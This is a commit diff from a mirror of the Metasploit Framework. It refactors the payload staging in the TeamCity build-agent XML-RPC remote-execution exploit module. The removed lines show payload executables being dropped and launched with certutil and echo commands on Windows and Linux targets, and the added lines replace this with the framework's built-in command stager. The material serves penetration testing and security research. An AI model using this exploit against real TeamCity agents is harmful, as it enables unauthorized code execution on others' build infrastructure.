infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Replace cmd generation with built-in stager module

GSoC/Meterpreter_Web_Console
Dylan Pindur 2018-10-07 10:15:10 +08:00
parent 0f34f94496
commit 94e45b12b1
No known key found for this signature in database
GPG Key ID: 16ECFF6E48A63236
1 changed files with 17 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb
View File

@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -83,22 +83,15 @@ class MetasploitModule < Msf::Exploit::Remote
def windows_stager(version)
print_status('Constructing Windows payload')
exe_payload = generate_payload_exe
exe_name = Rex::Text.rand_text_alpha(8)
b64_exe_payload = Rex::Text.encode_base64(exe_payload)
# Split payload into chunks so we can echo it into a file
split_payload = b64_exe_payload.scan(/.{1,2000}/m)
commands = split_payload.map { |x| "echo|set /p=\"#{x}\" >> #{exe_name}.b64" }
echo_file = commands.join("\n")
script_content = %(
#{echo_file}
certutil -decode #{exe_name}.b64 #{exe_name}.exe
start "" %cd%\\#{exe_name}.exe
)
xml_payload = build_request(script_content.strip!, version)
stager = generate_cmdstager(
flavor: :certutil,
temp: '.',
concat_operator: "\n",
nodelete: true
).join("\n")
stager = stager.gsub(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')
xml_payload = build_request(stager, version)
if xml_payload.nil?
fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
end
@ -110,17 +103,15 @@ class MetasploitModule < Msf::Exploit::Remote
def linux_stager(version)
print_status('Constructing Linux payload')
exe_payload = generate_payload_exe
exe_name = Rex::Text.rand_text_alpha(8)
exe_payload_encoded = Rex::Text.to_hex(exe_payload)
script_content = %(
echo -n -e '#{exe_payload_encoded}' > #{exe_name}
chmod +x #{exe_name}
./#{exe_name} &amp;
)
xml_payload = build_request(script_content.strip!, version)
stager = generate_cmdstager(
flavor: :echo,
temp: '.',
concat_operator: "\n",
nodelete: true
).join("\n")
stager << ' &amp;'
xml_payload = build_request(stager, version)
if xml_payload.nil?
fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
end